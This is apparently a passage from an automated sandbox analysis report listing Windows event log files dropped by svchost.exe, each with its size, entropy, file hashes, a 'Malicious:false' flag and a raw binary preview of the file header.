                                                                                                                                                                                SSDEEP:384:AhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfk:AzSKEqsMuy6/ij
                                                                                                                                                                                MD5:A7C99371DDFC5A4213129E4CACAFCBC1
                                                                                                                                                                                SHA1:DD3ED05CE634AA129B7F1385424AFB489F50C66A
                                                                                                                                                                                SHA-256:ED6442E39002736D07EE523A96024EB370A0E69A127E042D0EEA7C98F466831C
                                                                                                                                                                                SHA-512:E6642A332446467BF9D5DF8FF402EDF4184CA26FC50D8D224FFBDF0504E8B0E750BCC6664E9AE3F84BBC1A9E8F945F3D77B8BAF8F3A2E4FD971FD6EEC6E1E4B2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........P...............P...............8...D......................................................................./..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................`..................=...............................................................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Shimuser%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):2.24409357808026
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:mhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zS:mmw9g3LYx
                                                                                                                                                                                MD5:3E92F94FE6AA3FDC475D1591EF7E2704
                                                                                                                                                                                SHA1:B078DB603A5949847827FFD1EA107D357C22D6F8
                                                                                                                                                                                SHA-256:FD11BA3444675A33C4263FEAFDC9DD37E8061968D02E9BB4800B7E22D123DEB9
                                                                                                                                                                                SHA-512:A5362EB798F2F827B99F074F72D5B1208BDC89A23F152C85C3C8F9200B217F9F3E415A42B59D00D0DA765992DB085A9E47F63AC273404C95C914351150A8A4E8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........9...............9............t...v...4........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E............X..........n.......#...............................................................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.9546787598621266
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:ssgV71IUKGGk4yb27x1IMb27kdI2dIeWIbTcc2eI5Tcc:8h1IUbGk4NIsIKINIDI
                                                                                                                                                                                MD5:BA45982149D644A9243DF5BA6EB08A81
                                                                                                                                                                                SHA1:6DD8A1A7503D8323B24669AE91EA9C1308E30B15
                                                                                                                                                                                SHA-256:29302E33B11EBCBC0560A52847583AE37F2A2A72976A23F4AD71393E4FEBDBD4
                                                                                                                                                                                SHA-512:E0F1B9B471A40FC848A124DD0261FBC66B82FF3D9CC0DD655C8A6E2D9FBEEF0B9E1070D424589D8C3A57E0976A62B00AFC5BDF8B716B9D05DA5BE97B7B698AB5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.K.......P.......K.......P............S...j...N.(...................................................................../..................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..x...K.......`~.%W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 130, DIRTY
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):70168
                                                                                                                                                                                Entropy (8bit):4.523330722869543
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:TWYwLMQwWYwLMQWEQ8QtnkVKRNlY20sMY3Dp13/n/ydIxm6g/ZSi+uQ/NujMAEWC:rp
                                                                                                                                                                                MD5:32126E6705CF82CBB495F1AADD28EA3E
                                                                                                                                                                                SHA1:8F06727A92BE74D92C5934EDB547814286A5C589
                                                                                                                                                                                SHA-256:518253D3CFFB847A1F70EF0D37A8B1471B3F5F74A8E40BE42EB086E147CA4D41
                                                                                                                                                                                SHA-512:D8766DE76EF9857C89D71A3E05230574B80D3BAE515688AD0979D497610F7840F3A30A2FD94AE44E86D9C73BAE578648A4C563BF9C322E2C77257AC4234CA53F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfFile.....................................................................................................................T...ElfChnk.~...............~..............................>....................................................................F.s.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..x...~...........U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 378, DIRTY
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):108632
                                                                                                                                                                                Entropy (8bit):5.678538181854241
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:3ThAa5DpzuzNz0zxzuewKWMKFNa5TUa5pa5Oa5HMa5W2KvzyzIz2a5jNa5Oa5laI:D0QqEWP9G3PJ0QqEWP9G3PCw00
                                                                                                                                                                                MD5:91E0EFBA307F5D98B0E5BC0E902F1398
                                                                                                                                                                                SHA1:E671FBB8C01F6C0CFE745D845D46FB8B7E6C73CB
                                                                                                                                                                                SHA-256:17124A13BAB8970ADC23729D09AF6C79C13060734618FF7452A2D1F512C81CD4
                                                                                                                                                                                SHA-512:90643839595EE37A7D1304A84EA18E784E9BC8BCBE02E4B9B4631B7EDAC8DD40482E7F46C7F828D7D3398DA1EC7E9DE2FEA740C84A56291BC0F120508E88748F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfFile.................z...................................................................................................I,c5ElfChnk.q...............q...........................?,......................................................................`................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...............................................&.......................................................................................)...q.......**......q.......%x.OU..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):1.0906234381604036
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:1h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMOrMM/uMZeiMa:1eJw
                                                                                                                                                                                MD5:C5FF06DD8BE524B616F8663522CECD8F
                                                                                                                                                                                SHA1:C4103F0987D75AFE225436B8039C57F7CE40BDBA
                                                                                                                                                                                SHA-256:BE9EA2824B5985A8CA71792C629FCBAD2FE3267613E560F55512E1439F8D89DC
                                                                                                                                                                                SHA-512:2839A4B7356AA30DEA18794D81C10A81D4CB79C76380681EEBA6427D843DED6BB0A0B37AAA4AAF7715DE4C31DA9D30DFC1CF70F662E83B29CE8DC24EF1522DB3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................X0...1...p{{....................................................................s.\.........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................6(..................................................................................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.3544648067172504
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:chz1g1z1f1m51F1Z191f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS10r:c2jdjP0cs5uP/ub
                                                                                                                                                                                MD5:5E01D7C4731FBE5625EEC0680D1037F1
                                                                                                                                                                                SHA1:F5889D115B9E5869538E908EFFD8B28A0BB72462
                                                                                                                                                                                SHA-256:73D8518E4715F852C806A157EAD1506A36AABF4BDE478DCEFF96A84D81E27AE6
                                                                                                                                                                                SHA-512:1FC15D0D1B817E648209CC72E14EDBFCBC8CC827C70DAE75D8C8A5465927BDBD6142D73F203F3240D259F38A2451E555D763D07BA10F5CA47B200733AD37CC1C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................(.........O.......................................................................................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...........................................I.......................................................**.................WW..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.1696231850371728
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:7WhDIEQAGxIHIFIWbIfEITOIHI2IjWWIfEITFIrIPIhIwItIFFIf1ITMsVIfIMIx:7WZxGq00J4Q
                                                                                                                                                                                MD5:83943319A96C10E940921AE6D6E78CEC
                                                                                                                                                                                SHA1:1D85CCB1C88D41DC1F61EF29247AF2A48E122992
                                                                                                                                                                                SHA-256:8671B1631CAC70E92FBD7FAA0821D66F0011D581E43159FB0F6FF8C89475D27B
                                                                                                                                                                                SHA-512:70D01A89ABE8534BD410106D99D74B18999148FCB04F14B0A77A62F2D3A621325BF4FBB16AE3EE301C0EB7DA4FD94EF5EA0A2199B2BA5D17F3AB569FF8491538
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.T...............T...........................1.......................................................................u...........................................>...=...........................................................................................................................f...............?...........................m...................M...F................................................(..........as..................1...................................................................**......T.......B..d..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.8285527879711732
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:G2h6iIvcImIvITIQIoIoI3IEIMIoIBIbIlMI2I5IEFIzI5I:G2oxOT
                                                                                                                                                                                MD5:B980C446A2A107517F87CF34ADC83DD9
                                                                                                                                                                                SHA1:ECCBF6BD7A62E3914DA365893A1AA6D8DDD920CD
                                                                                                                                                                                SHA-256:CB0BF585620C448F0695AC37A7FFF2A358AED302660B31901C2D060921721FFB
                                                                                                                                                                                SHA-512:B2732AFC5D98033D990944E61930C3EA57D2ACFEE4A802476721665D7711FA2E9FEDCD7647917FE95AE03CDDC5DD927FA55F08F35CDEFA62EDC7CFD3C7FB5A39
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................#...$...>......................................................................V.=.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................^...................................................................................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.1037290630380294
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:n4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH13K:d
                                                                                                                                                                                MD5:7C3D15939EC70328CB06DAA08EA22573
                                                                                                                                                                                SHA1:BDA43799C74C483842C457E23EAAD47A136C976C
                                                                                                                                                                                SHA-256:5CA7B9E56E9708ED4F32F7C0BF086BF107C4A8AE7DBCE974FEB8AF9501D23902
                                                                                                                                                                                SHA-512:7875BC899CCEC1F62AD34E73A9F61D588BD6A98C2F768FB01FF1865B272FD8337DC15E6B5B18DB9B11DF565C543E2F329A784F73C3CF333B0F526E9F47021A58
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................@...P...J.{P......................................................................q.................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ......................................................................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:dBase III DBT, next free block index 1130785861, 1st item "**"
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):68576
                                                                                                                                                                                Entropy (8bit):3.789639885236981
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:Mf7utDBjV8k+uqeUtHpoVWWucRkpHrWbGyYKQc90XG07SZRcZv76NcRUjGHzLKv9:wutDBjV8k+uqPtHpoVW
                                                                                                                                                                                MD5:0554A88E00592A7384269BF9D6C039E5
                                                                                                                                                                                SHA1:B09A6F95B936E879494B716D0007B56ED809CDFF
                                                                                                                                                                                SHA-256:C686D9824E699DD1FC162DD2D11F21DC831A11DA267965D84AE5A72A2CB2CD53
                                                                                                                                                                                SHA-512:6E41F21DC3EF94AA02DCC94F166197FD54A346A22E1DE3DA3F3809E77E3B3171DCB98DD4DF57F2B9D9579F0FE6CC400738F205D5C92627E8FC386DD1D27692B0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.................Q.......S...........x.........r......................................................................}..................&...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**..P...Q.......#....$.........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):44232
                                                                                                                                                                                Entropy (8bit):5.144863623789974
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:XhWKoBQ0KamKyKXKaKwKBKFKNK+K3KaKrKaSKMKpKOKpKyrKipxKZjKb8KdTKhuu:XdvH5
                                                                                                                                                                                MD5:E81610A9C113962958025794683F4ACF
                                                                                                                                                                                SHA1:B9483ACFBAD044A08BE8D0C742700D5627099DB5
                                                                                                                                                                                SHA-256:8B9AA98D3E72D13D17D502B43EE3DC001E2EB74A3C677B9A5C9B22CCE0406AFF
                                                                                                                                                                                SHA-512:BB5F1D6150B5B513871C6B193D66E848A8E2B56F41E5227E873F217C9CA677DA72057AF6E4750A41E23A3C566FEBA484C1265C052AA2D9989C51FA118275A809
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.:.......f.......:.......f............u..Hw...-........................................................................n[................d...........................=...........................................................................................................................f...............?...........................m...................M...F........................(......................&........................%.......!..................................=...........W...................**......:.......]1...$.........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.7906584955348045
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:MhP8o8Z85848V8M8g8D8R8E8y8JB8M848r898:MN
                                                                                                                                                                                MD5:4581429C5AA67A59E35288D5B0B55942
                                                                                                                                                                                SHA1:F0B9983D5700F829CBB975F501FBA322F5522593
                                                                                                                                                                                SHA-256:DEDCEFB3F18D3B36D8D27631F4DF73637937BF907FB1EB891CCEA1C14C19F44D
                                                                                                                                                                                SHA-512:96E95B4DA3F900B38F6B53121AA9C142B85242F3C287233D93B191CE08C1E89280FAAA52A6EEFFE0E04ED282CD6374AF8286E2C905004C651AAC78FFEAEF7E19
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................8!..."..V.1.....................................................................8..Z........................................V...=...........................................................................................................................f...............?...........................m...................M...F...............................................v...........&.......................................................................................**..(.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.7670087503756804
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:1536:DXhMUyS+z1VV18o838c8bUc8cVVsz8VX8SoX8aA8cmtpjAiVB18dwE4vjcYoMjn1:DXenS
                                                                                                                                                                                MD5:1F37BB598B2D4A450141D9640464D28F
                                                                                                                                                                                SHA1:15B6CD2EEF997A042314EBCE610DFFFB732511C1
                                                                                                                                                                                SHA-256:55C4A029845C9C4A5D7BFA3E0EEB3782D6AA25BB8CF79084CEC904C3758038C2
                                                                                                                                                                                SHA-512:0826B1258FC9698ED5AC906DC245ABE6B6E86F55874428A36D0E66C7C88D43E43707AE0DA92765AC89B522BA86EAB6137B6FC3D7C1364380DA2A1B61E93FEC6E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........(...............(............J..xL...fTJ......................................................................................v...........................=...........................................................................................................................f...............?...........................m...................M...F................................................9..........&...............................................................O.......................**..............g5...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SMBServer%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):2.551634567387031
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:L0VsLY/Z5aFka2aKazzabCafama5Sa0ra6rzaJcavkao9O6aGyRvF5UN5325Oi5Z:RcEN
                                                                                                                                                                                MD5:9FE9303D437AE64AE7D6F84406623E46
                                                                                                                                                                                SHA1:A7CE105D08F7A28F815B5BF171B3EDEB56E5CFF5
                                                                                                                                                                                SHA-256:81E629C26EF40A78C5E60E749498BE53744A0D618273BE5AF3DA048009D7345C
                                                                                                                                                                                SHA-512:F08582C238A2B6E2257F16B30DB0D407980129438D57099E92CA9FDE99A55B84B814FBDEC73A164B4A5BB792906AE2C5C88E63FA71FBDA472276B3CAE68C4CC9
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........C...............C...................<b......................................................................-..s................Q...........................=...........................................................a...............................................................f...............?...2...........................................M...F...........................*...........&........b..................................................%_..........................]...................**.............._.............X..&.......X...],T.'tB..E........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2680
                                                                                                                                                                                Entropy (8bit):3.833839887904229
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:Mg8WJadCKOrCK3QKB69DWvgCKOrCK3QkkcqrFWFyCKOrCK3QkkcvhS6db:xadCKOrCKg669DWvgCKOrCKgkkcGFmyO
                                                                                                                                                                                MD5:26CB58ACFC28EB1D727DE5B3A786E274
                                                                                                                                                                                SHA1:1C9145F69DA606CB1ADBF269915BBB1F03C83EB7
                                                                                                                                                                                SHA-256:2AE812A353DDFA7A251260E9CE4ED17B49B69C1B2C6318110453593F07B9960F
                                                                                                                                                                                SHA-512:A6A495A1FD43CDDFB481256153BE65BD9222ED4009889626601E3A055C310483B78946194CE50602503C99CE184B09529D4440ED033E5873C94575C9F5AC8A8A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.'.......9.......'.......9...........`y..`|..Z..r.....................................................................+\.................\...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................5...&...................................................................................................**......7.......9s...$.........Z7;&...............................................................L.......b.....!.................9s...$..r.].[..N....W.6/d...`...7....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s........J...M..<.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.M.i.t.i.g.a.t.i.o.n.s./.K.e.r.n.e.l.M.o.d.e...!..^5...........h.......>...................................4.\.D.e.v.i.c.e.\.H.a.r.d.d.i.s.k.V.o.l.u.m.e.3.\.W.i

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.327219596727842
                                                                                                                                                                                Encrypted:false
